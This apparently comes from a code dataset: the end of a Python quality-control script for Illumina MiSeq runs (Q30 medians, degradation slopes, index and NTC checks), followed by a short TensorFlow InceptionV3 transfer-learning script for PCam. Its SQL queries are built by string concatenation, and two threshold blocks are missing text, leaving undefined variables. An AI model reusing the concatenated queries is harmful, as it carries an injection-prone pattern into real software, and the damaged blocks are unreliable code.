print(first_read_qual_subs[start:(num_tls*num_surfaces):,:])\n start += (num_tls*num_surfaces)\n print(np.sum(first_read_qual_subs[start:(num_tls*num_surfaces):,:]))\n '''\n\n ''' This approach below is too slow\n #Multiply each entry by the Q to get the values\n quality_vals = np.arange(1,51,1,int)\n quality_vals_str = quality_vals.astype(str)\n #print(quality_vals_str)\n #print(type(quality_vals[0]))\n #Do an elementwise multiplication\n #Create a list to store the result\n bins = []\n #print(len(cycle_qual_binned_vals))\n #print(len(quality_vals))\n #print(np.multiply(cycle_qual_binned_vals_str*quality_vals))\n for i,s in enumerate(quality_vals_str):\n bins.append((s*cycle_qual_binned_vals[i]))\n print(bins)\n '''\n\n #Tested using first_read_qual so that I could see the cycle numbers, now swapped over to first_read_qual_subs\n r1_qual_med = []\n Q30_median_over_cycle_r1 = []\n for qual_i,qual in enumerate(first_read_qual_subs[:,2][::(num_tls*num_surfaces)]):\n #print(iq)\n #print(iq*(num_tls*num_surfaces))\n #print(num_tls*num_surfaces) #This is 28 (which is 2*14 as expected)\n #print(first_read_qual[(iq*(num_tls*num_surfaces)),2])\n #print(first_read_qual[(iq*(num_tls*num_surfaces)):((iq*(num_tls*num_surfaces))+(num_tls*num_surfaces))]) #Checked and this is the final entry\n quality_chunk = (first_read_qual_subs[(qual_i*(num_tls*num_surfaces)):((qual_i*(num_tls*num_surfaces))+(num_tls*num_surfaces))])\n #print(quality_chunk)\n\n cycle_qual_binned_vals = np.sum(quality_chunk,axis = 0) #Checked is correct for first cycle\n \n #print(np.sum(quality_chunk,axis = 1))\n #print(np.mean(np.sum(quality_chunk,axis = 1)))\n \n #r1_med_qual_over_cycle.append(np.median(np.sum(quality_chunk,axis = 1)))\n \n '''\n print(cycle_qual_binned_vals)\n pl.plot(cycle_qual_binned_vals)\n pl.show()\n '''\n \n #Find the cumulative values on the array subset\n cycle_qual_binned_vals_cum = (np.cumsum(cycle_qual_binned_vals))\n\n #The median is at this position\n med_rank = (np.sum(cycle_qual_binned_vals)/2.0)\n #print(med_rank)\n \n #Proportion of total with this Q value\n #Create an array of suitable dimensions with the total\n #print(np.sum(cycle_qual_binned_vals))\n #print(np.divide(cycle_qual_binned_vals,))\n #Percentage of values falling into that Q value bin\n quality_percentage = ((cycle_qual_binned_vals*100)/(float(np.sum(cycle_qual_binned_vals))))\n #print(quality_percentage)\n #Low down qualities with high percentages\n '''\n From the colour coding on the Illumina SAV, I think we will be looking at 15% and over in any\n bin 15)\n #print(ans)\n #print(ans[0])\n #The Q score is ans+1 in this case as python is 0-indexed\n qual_perc_o15_under_Q30 = np.where(qual_perc_o15[0] < 29)\n #print(ans2)\n #print(ans2[0])\n #print(len(ans2))\n #print(ans2[0].size)\n #print(qual_i+1)\n #print(qual_perc_o15_under_Q30[0].size)\n if qual_perc_o15_under_Q30[0].size > 0:\n print(\"High percentage of total clusters under Q30 for cycle \" + str(qual_i+1))\n \n \n '''\n #Testing for an even value of /2\n med_rank = 9929106\n '''\n\n if(med_rank%1 != 0):\n med_rank = int(med_rank+0.5)\n elif(med_rank%1 == 0):\n '''\n This is not a true median as it should be the average of the two values\n med_rank and med_rank+2. However, due to the number of tied values, I don't\n really think it is likely to matter that much.\n '''\n med_rank = (med_rank)\n\n #How to discover which bin this value is in\n for cum_ind, cumulative_value in enumerate(cycle_qual_binned_vals_cum):\n if (med_rank < cumulative_value) and (med_rank > (cycle_qual_binned_vals_cum[cum_ind-1])):\n qual_med = cum_ind+1 #As python is 0 indexed\n \n #So the median of each cycle is- should get 101 of these\n #print(qual_med)\n r1_qual_med.append(qual_med) \n #print(proportion_Q30_r1[::14])\n #print(np.sum(proportion_Q30_r1))\n #print(qual_i) #Runs through the number of cycles, so will want qual_i + num_tiles for segment\n #print(proportion_Q30_r1[qual_i])\n Q30_proportion_chunk = (proportion_Q30_r1[(qual_i*(num_tls*num_surfaces)):((qual_i*(num_tls*num_surfaces))+(num_tls*num_surfaces))])\n #print(Q30_proportion_chunk)\n #print(np.median(Q30_proportion_chunk))\n Q30_median_over_cycle_r1.append((np.median(Q30_proportion_chunk)))\n '''\n pl.plot(Q30_proportion_chunk)\n pl.show()\n '''\n r1_qual_med = np.asarray(r1_qual_med)\n Q30_median_over_cycle_r1 = np.asarray(Q30_median_over_cycle_r1)\n\n #Work out the degradation coefficient for the loss in quality over the read\n Q30_median_over_cycle_r1_xdata = (np.arange(1,(len(Q30_median_over_cycle_r1)+1))) # Want it to start at 1 and stop at 101\n #Fit a curve to the data\n #pl.plot(Q30_median_over_cycle_r1_xdata,Q30_median_over_cycle_r1)\n\n #function to fit- make it non-linear\n #Initial guesses for parameters\n p1 = 0.5\n p2 = 0.5\n\n '''\n def func(x, p1,p2):\n return p1*np.cos(p2*x) + p2*np.sin(p1*x)\n '''\n\n def func(x, p1,p2):\n return(p1 * x + p2) #Linear\n\n #def func_quad(x, p1,p2,p3):\n #return(p1 * x**2 + p2 * x + p3)\n\n #fit_func = func(Q30_median_over_cycle_r1_xdata, p1,p2)\n #print(fit_func)\n\n #p0_q = scipy.array([1,1,1])\n \n #This requires a function as input\n optimal_vals_Q30_r1, covar_Q30_r1 = curve_fit(func,Q30_median_over_cycle_r1_xdata,Q30_median_over_cycle_r1, p0=(p1,p2))\n #optimal_vals_Q30_r1_q, covar_Q30_r1_q = curve_fit(func_quad,Q30_median_over_cycle_r1_xdata,Q30_median_over_cycle_r1, p0_q)\n #popt, pcov = curve_fit(func, xdata, ydata,p0=(1.0,0.2))\n\n #Constrain the input values to exclude the outlying values at the beginning and end?- FUTURE WORK!!\n\n #pl.plot(fit_func)\n #pl.plot(-Q30_median_over_cycle_r1_xdata**2)\n\n #pred = (optimal_vals_Q30_r1[0]*np.cos(optimal_vals_Q30_r1[1]*Q30_median_over_cycle_r1_xdata)) + (optimal_vals_Q30_r1[1]*np.sin(optimal_vals_Q30_r1[0]*Q30_median_over_cycle_r1_xdata))\n linear_pred_r1 = (optimal_vals_Q30_r1[0] * Q30_median_over_cycle_r1_xdata + optimal_vals_Q30_r1[1])\n #quad_pred = (optimal_vals_Q30_r1_q[0] * Q30_median_over_cycle_r1_xdata**2 + optimal_vals_Q30_r1_q[1] * Q30_median_over_cycle_r1_xdata + optimal_vals_Q30_r1_q[2])\n\n #print(covar_Q30_r1)\n\n '''\n #Get the sum of squared residuals\n residuals_r1 = Q30_median_over_cycle_r1 - func(Q30_median_over_cycle_r1_xdata,optimal_vals_Q30_r1[0],optimal_vals_Q30_r1[1])\n fres = sum(residuals_r1**2)\n\n #print(fres) # Measure of how good a fit the model is\n '''\n\n #Print out the slope of the line\n slope_Q30_r1 = optimal_vals_Q30_r1[0]\n #print(slope_Q30_r1)\n\n #slope_Q30_r1 = -0.0006 #test\n\n\n if abs(slope_Q30_r1) > 0.0005:\n #warnings.warn(\"Big drop in quality towards the end of read 1\")\n print(\"Big drop in quality towards the end of read 1\")\n\n '''\n #Create a nice illustrative plot- remember this isn't going to give any information at all about individual outliers, only a worrying trend\n pl.figure(1)\n pl.plot(Q30_median_over_cycle_r1_xdata,Q30_median_over_cycle_r1,'.')\n pl.plot(Q30_median_over_cycle_r1_xdata,linear_pred_r1)\n \n pl.show()\n '''\n #pl.figure(3)\n #pl.plot(Q30_median_over_cycle_r1_xdata,quad_pred)\n\n #pl.show()\n\n #So the median for cycle 1 of read 1 is \n #print(qual_med)- STOPPED THIS PRINTING OUT FOR NOW WHILE WAS WORKING ON SOMETHING ELSE\n #print(len(r1_qual_med)) # find out how many are stored- it is one per cycle\n\n '''\n print(first_read_qual_subs[::(num_tls*num_surfaces),:])\n print(len(first_read_qual_subs[::(num_tls*num_surfaces),:]))\n f = (len(first_read_qual_subs[::(num_tls*num_surfaces)]))\n '''\n\n #Read 2\n if r2_start < (len(qual_metrics_arr_mod_int_sorted)):\n #Handle the case where there is no second read\n Q30_by_row_r2 = np.ndarray.astype(np.sum(Q30_r2_arr,axis=1),float)\n total_by_row_r2 = np.ndarray.astype(np.sum(second_read_qual_subs,axis=1),float)\n proportion_Q30_r2 = np.divide(Q30_by_row_r2,total_by_row_r2)\n proportion_Q30_r2 = np.nan_to_num(proportion_Q30_r2)\n\n #Pull out the medians\n r2_qual_med = []\n Q30_median_over_cycle_r2 = []\n for qual_i,qual in enumerate(second_read_qual_subs[:,2][::(num_tls*num_surfaces)]):\n quality_chunk = (second_read_qual_subs[(qual_i*(num_tls*num_surfaces)):((qual_i*(num_tls*num_surfaces))+(num_tls*num_surfaces))])\n cycle_qual_binned_vals = np.sum(quality_chunk,axis = 0) #Checked is correct for first cycle \n #Find the cumulative values on the array subset\n cycle_qual_binned_vals_cum = (np.cumsum(cycle_qual_binned_vals))\n #The median is at this position\n med_rank = (np.sum(cycle_qual_binned_vals)/2.0)\n \n quality_percentage = ((cycle_qual_binned_vals*100)/(float(np.sum(cycle_qual_binned_vals))))\n\n '''\n From the colour coding on the Illumina SAV, I think we will be looking at 15% and over in any\n bin 15)\n #The Q score is ans+1 in this case as python is 0-indexed\n qual_perc_o15_under_Q30 = np.where(qual_perc_o15[0] < 29)\n if qual_perc_o15_under_Q30[0].size > 0:\n #As this is r2 need to add on read 1 and the index reads to get the cycle number- checked for correct length\n print(\"High percentage of total clusters under Q30 for cycle \" + str((qual_i+1)+read1_length+ind_reads))\n\n if(med_rank%1 != 0):\n med_rank = int(med_rank+0.5)\n elif(med_rank%1 == 0):\n '''\n This is not a true median as it should be the average of the two values\n med_rank and med_rank+2. However, due to the number of tied values, I don't\n really think it is likely to matter that much.\n '''\n med_rank = (med_rank)\n\n #How to discover which bin this value is in\n for cum_ind, cumulative_value in enumerate(cycle_qual_binned_vals_cum):\n if (med_rank < cumulative_value) and (med_rank > (cycle_qual_binned_vals_cum[cum_ind-1])):\n qual_med = cum_ind+1 #As python is 0 indexed\n \n #So the median of each cycle is- should get 101 of these\n #print(qual_med)\n r2_qual_med.append(qual_med) \n Q30_proportion_chunk = (proportion_Q30_r2[(qual_i*(num_tls*num_surfaces)):((qual_i*(num_tls*num_surfaces))+(num_tls*num_surfaces))])\n #print(Q30_proportion_chunk)\n #print(np.median(Q30_proportion_chunk))\n Q30_median_over_cycle_r2.append((np.median(Q30_proportion_chunk)))\n\n r2_qual_med = np.asarray(r2_qual_med)\n Q30_median_over_cycle_r2 = np.asarray(Q30_median_over_cycle_r2)\n\n #Work out the degradation coefficient for the loss in quality over the read\n Q30_median_over_cycle_r2_xdata = (np.arange(1,(len(Q30_median_over_cycle_r2)+1))) # Want it to start at 1 and stop at 101\n #Fit a curve to the data\n #function to fit- make it non-linear\n #Initial guesses for parameters- already above for r1, function also already defined above\n #This requires a function as input\n optimal_vals_Q30_r2, covar_Q30_r2 = curve_fit(func,Q30_median_over_cycle_r2_xdata,Q30_median_over_cycle_r2, p0=(p1,p2))\n linear_pred_r2 = (optimal_vals_Q30_r2[0] * Q30_median_over_cycle_r2_xdata + optimal_vals_Q30_r2[1])\n\n #Print out the slope of the line\n slope_Q30_r2 = optimal_vals_Q30_r2[0]\n #print(slope_Q30_r2)\n\n if abs(slope_Q30_r2) > 0.0005:\n #warnings.warn(\"Big drop in quality towards the end of read 2\")\n print(\"Big drop in quality towards the end of read 2\")\n\n '''\n #Create a nice illustrative plot- remember this isn't going to give any information at all about individual outliers, only a worrying trend\n pl.figure(2)\n pl.plot(Q30_median_over_cycle_r2_xdata,Q30_median_over_cycle_r2,'.')\n pl.plot(Q30_median_over_cycle_r2_xdata,linear_pred_r2)\n '''\n\n ##Do the degredation coefficient over r1 and r2 concatenated\n #This is not useful if there is no r2- currently nest within if clause\n #Concatenate the data for r1 and r2\n Q30_median_over_cycle_both = np.concatenate((Q30_median_over_cycle_r1,Q30_median_over_cycle_r2))\n Q30_median_over_cycle_both_xdata = (np.arange(1,(len(Q30_median_over_cycle_both)+1))) # Want it to start at 1 and stop at 101\n #Fit a curve to the data\n #function to fit- make it non-linear\n #Initial guesses for parameters- already above for r1, function also already defined above\n #This requires a function as input\n optimal_vals_Q30_both, covar_Q30_both = curve_fit(func,Q30_median_over_cycle_both_xdata,Q30_median_over_cycle_both, p0=(p1,p2))\n linear_pred_both = (optimal_vals_Q30_both[0] * Q30_median_over_cycle_both_xdata + optimal_vals_Q30_both[1])\n\n #Print out the slope of the line\n slope_Q30_both = optimal_vals_Q30_both[0]\n #print(slope_Q30_both)\n\n if abs(slope_Q30_both) > 0.0005:\n #warnings.warn(\"Big drop in quality towards the end of both of the reads\")\n print(\"Big drop in quality towards the end of both of the reads\")\n \n '''\n #Create a nice illustrative plot- remember this isn't going to give any information at all about individual outliers, only a worrying trend\n pl.figure(3)\n pl.plot(Q30_median_over_cycle_both_xdata,Q30_median_over_cycle_both,'.')\n pl.plot(Q30_median_over_cycle_both_xdata,linear_pred_both)\n '''\n \n '''Removed plot for now\n pl.plot(Q30_median_over_cycle_r2)\n pl.show()\n '''\n\n '''\n #Is this the same data as before (right up near the data extract)\n print(prop_Q30_r1)\n print(proportion_Q30_r1)\n print(np.mean(proportion_Q30_r1))\n print(prop_Q30_r2)\n print(proportion_Q30_r2)\n print(np.mean(proportion_Q30_r2))\n '''\n\n #Intensity over cycle information- means over all tiles- NOT ACTALLY USING THIS ATM\n cursor.execute(\"\"\" SELECT CycleID, Intensity_A, Intensity_C, Intensity_G, Intensity_T\n FROM ExtractionMetrics\n WHERE ExtractionMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\" \"\"\"\n ORDER BY ExtractionMetrics.MiSeqRunID, ExtractionMetrics.CycleID \"\"\")\n intensity_cycles = cursor.fetchall()\n #print(\"Intensity for each base over cycle Retrieved\")\n intensity_cycles_arr = np.asarray(intensity_cycles)\n #print(intensity_cycles_arr)\n #print(intensity_cycles_arr[:,0]) #cycle\n int_A_cycles = []\n int_C_cycles = []\n int_G_cycles = []\n int_T_cycles = []\n #Chunk this up into segments on cycle as before\n for int_i,int_cycle in enumerate(intensity_cycles_arr[:,0][::(num_tls*num_surfaces)]):\n #print(int_cycle)\n int_chunk = (intensity_cycles_arr[:,:][(int_i*(num_tls*num_surfaces)):((int_i*(num_tls*num_surfaces))+(num_tls*num_surfaces))])\n #print(int_chunk)\n #print(np.sum(int_chunk))\n int_A_cycles.append(np.mean(int_chunk[:,1]))\n int_C_cycles.append(np.mean(int_chunk[:,2]))\n int_G_cycles.append(np.mean(int_chunk[:,3]))\n int_T_cycles.append(np.mean(int_chunk[:,4]))\n #print(int_A_cycles)\n #print(int_C_cycles)\n #print(int_G_cycles)\n #print(int_T_cycles)\n #print(intensity_cycles_arr[:,0][::(num_tls*num_surfaces)]) # All cycle numbers once in an array\n\n #Removing the index reads and splitting into r1 and r2\n int_A_cycles_r1 = int_A_cycles[0:read1_length]\n int_A_cycles_r2 = int_A_cycles[(read1_length+ind_reads):(read1_length+ind_reads)+read2_length]\n int_C_cycles_r1 = int_C_cycles[0:read1_length]\n int_C_cycles_r2 = int_C_cycles[(read1_length+ind_reads):(read1_length+ind_reads)+read2_length]\n int_G_cycles_r1 = int_G_cycles[0:read1_length]\n int_G_cycles_r2 = int_G_cycles[(read1_length+ind_reads):(read1_length+ind_reads)+read2_length]\n int_T_cycles_r1 = int_T_cycles[0:read1_length]\n int_T_cycles_r2 = int_T_cycles[(read1_length+ind_reads):(read1_length+ind_reads)+read2_length]\n\n\n #Indexing- different proportion of reads?\n cursor.execute(\"\"\" SELECT * FROM IndexMetricsMSR\n WHERE IndexMetricsMSR.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\" \"\"\"\n ORDER By IndexMetricsMSR.IndexName \"\"\")\n index_metrics = cursor.fetchall() #[0][0]\n index_metrics_arr = np.asarray(index_metrics) \n \n if len(index_metrics_arr) == 0:\n #warnings.warn(\"No index information for run \" + str(run_for_import))\n print(\"No index information for run \" + str(run_for_import))\n continue #Continue with the next interation of the loop \n \n #Note that this is sorted by Index Name and therefore chunks of 28 (as before with the quality by cycle)\n #(numtiles*numsurfaces) correspond to each index\n #print(index_metrics_arr)\n #print(index_metrics_arr[:,5])\n total_per_index = []\n for inde_i,inde in enumerate(index_metrics_arr[:,5][::(num_tls*num_surfaces)]):\n index_chunk = (index_metrics_arr[:,5][(inde_i*(num_tls*num_surfaces)):((inde_i*(num_tls*num_surfaces))+(num_tls*num_surfaces))])\n #print(index_chunk) #Tested correct with full index_metrics_arr (rather than just value)\n #Convert array to a numerical type- needed to exclude runid before doing this\n index_chunk_int = np.ndarray.astype(index_chunk,int)\n total_per_index.append(np.sum(index_chunk_int))\n #print(\"Next\") #See above\n\n #print(index_metrics_arr[:,4][::(num_tls*num_surfaces)])\n\n #Obtain the total number of counts per sample (over all tiles) and then this as a proportion of total number\n #passing filter (which includes undetermined reads)\n total_per_index_arr = np.asarray(total_per_index)\n #print(total_per_index_arr)\n #print(reads_per_run_pf)\n prop_pf_per_index_arr = ((total_per_index_arr)/(float(reads_per_run_pf)*100)) # Integer division gives 0\n #print(prop_pf_per_index_arr)\n #print(np.sum(total_per_index_arr))\n ## This will enable (divided by the number of reads passing filter)- to get %reads identified (PF) from Indexing page of SAV\n #print(100*(np.sum(total_per_index_arr)/float(reads_per_run_pf))) #Note avoiding integer division = 0 again\n\n #Either/Or for labelling\n sample_names = index_metrics_arr[:,6][::(num_tls*num_surfaces)] \n #Set the index names to the sequence of the indices\n #index_names = index_metrics_arr[:,4][::(num_tls*num_surfaces)] \n #Set the index names to the name of the sample\n index_names = sample_names\n\n index_x_axis = np.arange(len(index_names)) #This is required for the later setting of xticks to labels\n\n ##Before deciding on the outlying samples, the NTC should be removed as it is a special case\n #It would still be good if it appeared on the plot though- this has been achieved\n location_of_ntc = []\n for samp_ind,samp in enumerate(sample_names):\n #find_ntc = re.compile(\"NTC\") # This syntax could be useful for later\n '''\n print(samp)\n matches = re.findall(\"NTC\", samp)\n mat = re.match(\"NTC\", samp)\n se = re.search(\"NTC\", samp)\n print(matches)\n print(mat)\n print(se)\n '''\n if re.search(\"ntc\", samp, re.IGNORECASE):\n '''\n Find the NTC and remove it from the list of outlying samples, leaving only the samples\n which are over or under represented\n This version assumed that there was one NTC, amended to handle the case where there\n is more than one\n '''\n #print(samp)\n #print(samp_ind)\n #print(prop_pf_per_index_arr[samp_ind])\n #print(prop_pf_per_index_arr[0:samp_ind])\n #print(prop_pf_per_index_arr[(samp_ind+1):len(prop_pf_per_index_arr)])\n #Remove the NTC which will skew the data\n '''\n prop_pf_index_subs_arr = (np.concatenate((prop_pf_per_index_arr[0:samp_ind],prop_pf_per_index_arr[(samp_ind+1):len(prop_pf_per_index_arr)])))\n sample_names_subs = (np.concatenate((sample_names[0:samp_ind],sample_names[(samp_ind+1):len(sample_names)])))\n #Need to handle the case where there is >1 NTC\n location_of_ntc.append(samp_ind)\n n = samp_ind\n '''\n location_of_ntc.append(samp_ind)\n \n #else:\n #print(samp)\n # Only want to put these into the mean etc as the NTC should be treated as a special case\n\n #Create an array containing the NTC entries only\n #print(location_of_ntc)\n #location_of_ntc = [8,10] # This was for testing purposes: checking it worked if had more than 1 NTC\n prop_pf_index_ntc_arr = prop_pf_per_index_arr[location_of_ntc]\n sample_names_ntc = sample_names[location_of_ntc]\n #print(sample_names_ntc)\n #print(prop_pf_index_ntc_arr)\n ntc_arr = np.vstack((sample_names_ntc,prop_pf_index_ntc_arr)).T\n #print(ntc_arr) #Sample name and value in a 2D array\n \n #Create an array containing all the entries except the NTC ones \n prop_pf_index_subs_arr = np.delete(prop_pf_per_index_arr,location_of_ntc)\n sample_names_subs = np.delete(sample_names,location_of_ntc)\n not_ntc_arr = np.vstack((sample_names_subs,prop_pf_index_subs_arr)).T\n #print(not_ntc_arr) #Sample name and value in a 2D array\n\n #print(prop_pf_per_index_arr)\n #print(prop_pf_index_subs_arr)\n ind_mean = (np.mean(prop_pf_index_subs_arr))\n #print(ind_mean)\n ind_std = (np.std(prop_pf_index_subs_arr))\n #print(ind_std)\n ind_high_threshold = (ind_mean + (2*ind_std))\n ind_low_threshold = (ind_mean - (2*ind_std))\n\n #Change threshold for testing purposes\n #ind_high_threshold = 5\n\n #print(np.where(prop_pf_per_index_arr > ind_high_threshold))\n #print(np.where(prop_pf_per_index_arr < ind_low_threshold))\n\n outlying_indexes = (np.where((prop_pf_index_subs_arr < ind_low_threshold) | (prop_pf_index_subs_arr > ind_high_threshold)))\n #print(outlying_indexes)\n #print(outlying_indexes[0])\n outlying_sample_indexes = (sample_names_subs[outlying_indexes[0]])\n #print(outlying_sample_indexes) #Checked correct against SAV\n #print(prop_pf_index_subs_arr[outlying_indexes[0]]) #This is the percentage of it\n #Concatenate the sample name and its value for later readout in a numpy array\n outlying_samples_values_arr = np.vstack((outlying_sample_indexes,prop_pf_index_subs_arr[outlying_indexes[0]])).T\n\n #np.savetxt(\"C:\\Users\\Sara\\Dropbox\\Bioinformatics Clinical Science\\MScProject\\PlayingWithExcelData\\LookatMe.csv\",arre, delimiter=\",\", fmt=\"%s\")\n #outlying_sample_indexes = [] #Test for correct triggering of if clause below\n #print(np.where(outlying_sample_indexes != \"NTC_15-13654\"))\n\n #Coefficient of variation\n #print(ind_std)\n #print(ind_mean)\n index_COV = (ind_std/ind_mean)\n #print(index_COV)\n\n threshold_index_COV = 0.03 # Set to 3% otherwise very low samples won't trigger this (known because of COV value including NTC below)\n # This is way too sensitive at the moment (Matt suggests 5%)\n\n if index_COV > threshold_index_COV:\n #warnings.warn(\"Big range over different sample indices\") # Note that NTCs are excluded by this code\n print(\"Big range over different sample indices\")\n\n '''\n #Work out COV including NTC- to see if matches Illumina's calculation\n ind_std_2 = np.std(prop_pf_per_index_arr)*100\n ind_mean_2 = np.mean(prop_pf_per_index_arr)*100\n index_COV_2 = (ind_std_2/ind_mean_2)\n print(np.min(prop_pf_per_index_arr))\n print(np.max(prop_pf_per_index_arr))\n print(index_COV_2) # This should be 0.4775 and comes out as 0.455\n '''\n\n if (len(outlying_indexes[0])) > 0:\n '''\n NEED TO WORK ON HOW TO PRESENT THIS DATA TO THE USER!! Also this is slightly redundant with the COV- but threshold is at 5% there, so this is more sensitive\n '''\n #warnings.warn(\"There is at least one outlying sample\")\n print(\"There is at least one outlying sample\")\n #print(outlying_samples_values_arr)\n low_num_reads_ind = (np.where(outlying_samples_values_arr[:,1] < ind_low_threshold))[0]\n #print(low_num_reads) #The index at which the low number of reads are found\n low_num_reads = (outlying_samples_values_arr[low_num_reads_ind,:])\n #print(low_num_reads) #The samples with proportions less than the low threshold in an array\n high_num_reads_ind = (np.where(outlying_samples_values_arr[:,1] > ind_high_threshold))[0]\n high_num_reads = (outlying_samples_values_arr[high_num_reads_ind,:])\n #print(high_num_reads) #The samples with proportions higher than the high threshold in an array\n '''\n if outlying_samples_values_arr[0][1] < ind_low_threshold:\n print(\"One sample has a very low number of reads\")\n '''\n\n #Is the NTC elevated above baseline (i.e. is there contamination in the run?)\n NTC_threshold = 1.0\n '''\n print(ntc_arr)\n print(ntc_arr[:,1])\n print(prop_pf_index_ntc_arr)\n print(prop_pf_index_ntc_arr.any())\n '''\n\n if (len(np.where(prop_pf_index_ntc_arr > NTC_threshold)[0])) > 0: #If there is an entry in the array of the where\n #warnings.warn(\"NTC has a higher than expected proportion of reads\")\n print(\"NTC has a higher than expected proportion of reads\")\n\n '''\n print(location_of_ntc)\n print((sample_names[location_of_ntc],prop_pf_per_index_arr[location_of_ntc]))\n print((sample_names[n],prop_pf_per_index_arr[n]))\n print(ind_low_threshold)\n #if prop_pf_per_index_arr[location_of_ntc] > 0.5:\n #warnings.warn(\"NTC has a higher than expected proportion of reads\")\n '''\n\n #pl.show()\n \n '''\n #Plot all the different indexes (all together)\n fig1 = pl.figure(1)\n ax1 = fig1.add_subplot(1,1,1) # one row, one column, first plot\n pl.xticks(index_x_axis,index_names)\n ax1.scatter(index_x_axis,prop_pf_per_index_arr)\n ax1.set_xlabel(\"Index\")\n pl.show()\n '''\n '''\n #Plot intensity over cycle\n fig2 = pl.figure(2)\n #pl.plot((intensity_cycles_arr[:,0][::(num_tls*num_surfaces)]),int_A_cycles)\n pl.plot(int_A_cycles_r1)\n pl.plot(int_C_cycles_r1)\n pl.plot(int_G_cycles_r1)\n pl.plot(int_T_cycles_r1)\n\n fig3 = pl.figure(3)\n pl.plot(int_A_cycles_r2)\n pl.plot(int_C_cycles_r2)\n pl.plot(int_G_cycles_r2)\n pl.plot(int_T_cycles_r2)\n\n pl.show()\n '''\n\n '''\n pl.figure(11)\n f2 = pl.plot(proportion_Q30_r1)\n\n pl.figure(12)\n f3 = pl.plot(proportion_Q30_r2)\n\n pl.show()\n '''\n '''\n #Concatenate the arrays to get the same plot as the original data extract to double-check\n proportion_Q30_rboth = np.concatenate((proportion_Q30_r1,proportion_Q30_r2))\n pl.figure(13)\n f4 = pl.plot(proportion_Q30_rboth)\n\n\n #Do the median plots\n pl.figure(14)\n f5 = pl.plot(r1_qual_med)\n\n pl.figure(15)\n f6 = pl.plot(r2_qual_med)\n\n rboth_qual_med = np.concatenate((r1_qual_med,r2_qual_med))\n #print(len(rboth_qual_med)) #Correct length of 202 in this example, with reads of 101 cycles length\n pl.figure(16)\n f4 = pl.plot(rboth_qual_med)\n\n\n pl.show()\n '''\n\n#Does it look how one would expect?\n\n#Close the files?\n#file_of_runs.close()\n","sub_path":"RunQC/src/RunQCMultiTestingMod.py","file_name":"RunQCMultiTestingMod.py","file_ext":"py","file_size_in_byte":64761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"474585886","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, BatchNormalization, Activation\nfrom tensorflow.keras.layers import Conv2D, MaxPool2D, GlobalAveragePooling2D\nfrom tensorflow.keras.optimizers import RMSprop, Adam\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom pcam_utils import plot_figures, load_norm_data\nfrom tensorflow.keras import metrics\nfrom sklearn.metrics import roc_curve, auc\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport logging\n\nfrom tensorflow.keras.applications.inception_v3 import InceptionV3\n\n# written by Eric Bonnet 03.2020\n# eric.d.bonnet@gmail.com\n# transfer learning and full Inception re-training model for the pcam dataset\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level = logging.INFO)\n\nlogging.info(\"loading data\")\n(x_train, x_valid, x_test, y_train, y_valid, y_test) = load_norm_data()\n\n# Hyper parameters\nnb_epochs = 10 \nbatch_size = 64 \nnb_dense_layers = 256\ndata_augmentation = False \n\nprint(\"nb epochs: \"+str(nb_epochs))\nprint(\"batch size: \"+str(batch_size))\nprint(\"nb dense layers: \"+str(nb_dense_layers))\nprint(\"data augmentation: \"+str(data_augmentation))\n\nif data_augmentation == True:\n\n train_datagen = ImageDataGenerator(\n rotation_range = 40,\n width_shift_range = 0.2,\n height_shift_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True,\n vertical_flip = True,\n fill_mode = 'nearest')\n\n train_generator = train_datagen.flow(x_train, y_train, batch_size = batch_size)\n\n# create the base pre-trained model\nbase_model = InceptionV3(weights='imagenet', include_top=False)\n\n# add a global spatial average pooling layer\nx = base_model.output\nx = GlobalAveragePooling2D()(x)\n\n# let's add a fully-connected layer\nx = Dense(nb_dense_layers, activation='relu')(x)\npredictions = Dense(1, activation='sigmoid')(x)\nmodel = Model(inputs=base_model.input, outputs=predictions)\n\n# first: train only the top layers (which were randomly initialized)\n# i.e. freeze all convolutional InceptionV3 layers\n# if this value is set to True, the model will be fully re-trained on the dataset\nfor layer in base_model.layers:\n layer.trainable = False \n\n# set checkpointing\ncheckpoint_path = \"pcam_weights.h5\"\ncheckpoint = ModelCheckpoint(checkpoint_path, monitor='val_accuracy', verbose=1, save_best_only=True, save_weights_only=True, mode='max')\ncallbacks_list = [checkpoint]\n\nmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n\nprint(model.summary())\nprint(\"nb layers: \"+str(len(model.layers)))\n\nlogging.info(\"training model\")\n\nif data_augmentation == False:\n history = model.fit(x_train, y_train, validation_data=(x_valid, y_valid), epochs=nb_epochs, batch_size=batch_size, verbose=1, callbacks=callbacks_list)\nelse:\n steps_per_epoch = x_train.shape[0] // batch_size\n print(\"steps_per_epoch: \"+str(steps_per_epoch))\n history = model.fit_generator(train_generator, \n steps_per_epoch = steps_per_epoch, \n epochs = nb_epochs, \n verbose=1 , \n validation_data = (x_valid, y_valid), \n callbacks = callbacks_list)\n\nlogging.info(\"training done\")\n\n# load best weights\nmodel.load_weights(checkpoint_path)\n\nlogging.info(\"evaluate model\")\n\n# calculate loss and accuracy on test set\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Test loss: '+str(score[0]))\nprint('Test accuracy: '+str(score[1]))\n\n# calculate false positive rate, true positive rate, roc area under the curve and plot figures\ny_pred = model.predict(x_test)\nfpr, tpr, _ = roc_curve(y_test, y_pred)\nroc_auc = auc(fpr, tpr)\nprint(\"ROC auc: \"+str(roc_auc))\n\nlogging.info(\"plotting figures\")\n\nplot_figures(fpr, tpr, history, roc_auc, \"roc.png\", \"loss.png\", \"accuracy.png\")\n\n\n","sub_path":"legacy_code/code/tensorflow2.1/03_transfer_learning.py","file_name":"03_transfer_learning.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
